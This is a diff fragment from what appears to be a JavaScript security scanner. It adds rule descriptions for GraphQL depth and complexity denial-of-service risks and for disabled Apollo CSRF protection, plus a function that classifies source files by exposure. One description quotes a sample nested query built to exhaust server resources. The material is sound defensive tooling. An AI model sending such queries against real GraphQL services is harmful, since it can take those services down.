+ VC204: "Without a query depth limit, attackers send 100-level-deep nested queries that explode in resolver and DB cost. The server walks every level, the database does too, and a single crafted query takes the service down.",
480
+ VC205: "Even with a depth limit, queries like users(first:1000){posts(first:1000){comments(first:1000)}} are only three levels deep but resolve a billion items. Without complexity analysis, attackers DoS your GraphQL with a single request.",
481
+ VC206: "Apollo Server's csrfPrevention guards against cross-site form-style requests against GraphQL mutations. Disabling it lets any website trigger mutations in a logged-in user's browser \u2014 buying, deleting, or transferring on the victim's behalf."
286
482
  };
287
483
 
484
+ // src/exposure.ts
485
+ function classifyExposure(filePath) {
486
+ if (/(?:\/api\/|pages\/api\/|routes?\/|controllers?\/|endpoints?\/|server\.|app\/.*route\.)/.test(
487
+ filePath
488
+ )) {
489
+ return "public";
490
+ }
491
+ if (/(?:app\/.*page\.|pages\/(?!api\/)|views?\/|templates?\/)/.test(filePath)) {
492
+ return "public";
493
+ }
494
+ if (/(?:lib\/|utils?\/|helpers?\/|services?\/|models?\/|hooks?\/)/.test(
495
+ filePath
496
+ )) {
497
+ return "internal";
498
+ }
499
+ if (/(?:middleware|config|constants?)/.test(filePath)) {
500
+ return "internal";
501
+ }
502
+ return "unknown";
503
+ }
504
+
288
505
  // src/ast/parse.ts
289
506
  var import_parser = require("@babel/parser");
290
507
  var MAX_CACHE = 256;
@@ -8102,6 +8319,7 @@ function scanEntropy(files) {
8102
8319
  calculateGrade,
8103
8320
  callSpreads,
8104
8321
  callbackHell,
8322
+ classifyExposure,
8105
8323
  clickjacking,
8106
8324
  clientComponentSecret,
8107
8325
  clientSideAuth,